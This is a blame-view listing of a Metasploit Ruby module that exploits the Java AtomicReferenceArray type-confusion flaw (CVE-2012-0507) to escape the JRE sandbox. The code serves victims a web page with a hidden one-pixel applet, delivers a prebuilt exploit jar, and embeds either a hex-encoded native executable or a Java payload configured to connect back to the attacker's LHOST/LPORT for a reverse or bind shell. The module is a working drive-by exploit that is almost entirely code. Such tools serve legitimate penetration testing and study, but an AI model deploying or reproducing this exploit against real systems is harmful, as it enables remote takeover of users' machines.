Files

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

178 lines
5.3 KiB
Ruby
Raw Permalink Normal View History

2012-03-29 10:31:14 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2012-03-29 10:31:14 -05:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2012-03-29 10:31:14 -05:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::BrowserAutopwn
2025-12-17 17:11:13 -05:00
autopwn_info({ javascript: false })
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability',
'Description' => %q{
2012-03-29 10:31:14 -05:00
This module exploits a vulnerability due to the fact that
2025-06-20 13:20:44 +01:00
AtomicReferenceArray uses the Unsafe class to store a reference in an
array directly, which may violate type safety if not used properly.
This allows a way to escape the JRE sandbox, and load additional classes
in order to perform malicious operations.
},
'License' => MSF_LICENSE,
'Author' => [
'Jeroen Frijters', # Initial discovery according to his blog
'sinn3r', # metasploit module
'juan vazquez', # metasploit module
'egypt' # added support for older java versions
2012-03-29 10:31:14 -05:00
],
2025-06-20 13:20:44 +01:00
'References' => [
2012-03-29 10:31:14 -05:00
['CVE', '2012-0507'],
['OSVDB', '80724'],
2012-03-29 10:31:14 -05:00
['BID', '52161'],
['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
2012-04-01 01:30:50 -05:00
['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'],
2022-01-23 15:28:32 -05:00
['URL', 'https://www.rapid7.com/blog/post/2012/03/29/cve-2012-0507--java-strikes-again']
2012-03-29 10:31:14 -05:00
],
2025-06-20 13:20:44 +01:00
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' => [
[
'Generic (Java Payload)',
2012-03-29 10:31:14 -05:00
{
'Platform' => ['java'],
2025-12-17 17:11:13 -05:00
'Arch' => ARCH_JAVA
2012-03-29 10:31:14 -05:00
}
],
2025-06-20 13:20:44 +01:00
[
'Windows x86 (Native Payload)',
2012-03-29 10:31:14 -05:00
{
'Platform' => 'win',
2025-12-17 17:11:13 -05:00
'Arch' => ARCH_X86
2012-03-29 10:31:14 -05:00
}
],
2025-06-20 13:20:44 +01:00
[
'Mac OS X PPC (Native Payload)',
2012-03-29 10:31:14 -05:00
{
'Platform' => 'osx',
2025-12-17 17:11:13 -05:00
'Arch' => ARCH_PPC
2012-03-29 10:31:14 -05:00
}
],
2025-06-20 13:20:44 +01:00
[
'Mac OS X x86 (Native Payload)',
2012-03-29 10:31:14 -05:00
{
'Platform' => 'osx',
2025-12-17 17:11:13 -05:00
'Arch' => ARCH_X86
2012-03-29 10:31:14 -05:00
}
],
2025-06-20 13:20:44 +01:00
[
'Linux x86 (Native Payload)',
2012-03-29 10:31:14 -05:00
{
'Platform' => 'linux',
2025-12-17 17:11:13 -05:00
'Arch' => ARCH_X86
2012-03-29 10:31:14 -05:00
}
],
],
2025-06-20 13:20:44 +01:00
'DefaultTarget' => 0,
'DisclosureDate' => '2012-02-14',
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
2012-03-29 10:31:14 -05:00
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
def exploit
# load the static jar file
2025-12-17 17:11:13 -05:00
path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2012-0507.jar')
fd = File.open(path, 'rb')
2012-03-29 10:31:14 -05:00
@jar_data = fd.read(fd.stat.size)
fd.close
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
super
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
def on_request_uri(cli, request)
2025-12-17 17:11:13 -05:00
data = ''
host = ''
port = ''
2013-08-30 16:28:54 -05:00
2025-12-17 17:11:13 -05:00
if !request.uri.match(/\.jar$/i)
if !request.uri.match(%r{/$})
send_redirect(cli, get_resource + '/', '')
2012-03-29 10:31:14 -05:00
return
end
2013-08-30 16:28:54 -05:00
2025-12-17 17:11:13 -05:00
print_status("Sending #{name}")
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
payload = regenerate_payload(cli)
2025-12-17 17:11:13 -05:00
if !payload
print_error('Failed to generate the payload.')
2012-03-29 10:31:14 -05:00
return
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
if target.name == 'Generic (Java Payload)'
if datastore['LHOST']
2025-06-20 13:20:44 +01:00
jar = payload.encoded
2012-03-29 10:31:14 -05:00
host = datastore['LHOST']
port = datastore['LPORT']
2025-12-17 17:11:13 -05:00
vprint_status('Sending java reverse shell')
2012-03-29 10:31:14 -05:00
else
port = datastore['LPORT']
2014-04-14 22:17:31 -05:00
host = cli.peerhost
2025-12-17 17:11:13 -05:00
vprint_status('Java bind shell')
2012-03-29 10:31:14 -05:00
end
if jar
2025-06-20 13:20:44 +01:00
print_status("Generated jar to drop (#{jar.length} bytes).")
2025-12-17 17:11:13 -05:00
jar = Rex::Text.to_hex(jar, '')
2012-03-29 10:31:14 -05:00
else
2025-12-17 17:11:13 -05:00
print_error('Failed to generate the executable.')
2012-03-29 10:31:14 -05:00
return
end
else
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
print_status("Generated executable to drop (#{data.length} bytes).")
2025-12-17 17:11:13 -05:00
data = Rex::Text.to_hex(data, '')
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
send_response_html(cli, generate_html(data, jar, host, port), { 'Content-Type' => 'text/html' })
2012-03-29 10:31:14 -05:00
return
end
2013-08-30 16:28:54 -05:00
2025-12-17 17:11:13 -05:00
print_status('Sending jar')
send_response(cli, generate_jar, { 'Content-Type' => 'application/octet-stream' })
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
handler(cli)
2012-03-29 10:31:14 -05:00
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
def generate_html(data, jar, host, port)
2025-12-17 17:11:13 -05:00
jar_name = rand_text_alpha(rand(3..8)) + '.jar'
2013-08-30 16:28:54 -05:00
2025-12-17 17:11:13 -05:00
html = '<html><head></head>'
html += '<body>'
2012-03-30 02:06:56 -05:00
html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
2012-03-29 10:31:14 -05:00
html += "<param name=\"data\" value=\"#{data}\"/>" if data
html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
2025-12-17 17:11:13 -05:00
html += '</applet></body></html>'
2012-03-29 10:31:14 -05:00
return html
end
2013-08-30 16:28:54 -05:00
2025-12-17 17:11:13 -05:00
def generate_jar
2012-03-29 10:31:14 -05:00
return @jar_data
end
end